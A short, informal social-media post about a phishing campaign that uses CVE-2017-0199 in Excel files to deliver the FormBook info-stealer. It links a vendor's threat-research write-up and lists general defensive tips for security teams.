k3ymπΊπ¨ 0-day vibes from 2017? Yup, itβs still happening.
A malicious Excel file using CVE-2017-0199 is out here in 2025 dropping FormBook like it's a fresh mixtape.
The attack chain?
- Macro-free Excel
- Weaponized with remote .hta
- Payload: Info-stealer FormBook
Despite being 7+ years old, this vuln still slaps in phishing campaigns β because patching is apparently a myth.
Full technical breakdown by @FortiGuardLabs: https://www.fortinet.com/blog/threat-research/how-a-malicious-excel-file-cve-2017-0199-delivers-the-formbook-payload
TL;DR for blue teamers:
- Watch your egress traffic
- Harden Office apps
- Monitor LOLBins (Living Off the Land Binaries)
- Block outbound to shady IPs faster than your memes go viral
Donβt let your org get dunked on by a 2017 CVE in 2025. Thatβs not a good look.
#CyberSecurity #ThreatIntel #FormBook #CVE20170199 #Infosec #BlueTeam #MalwareAnalysis #HackerNews #Phishing
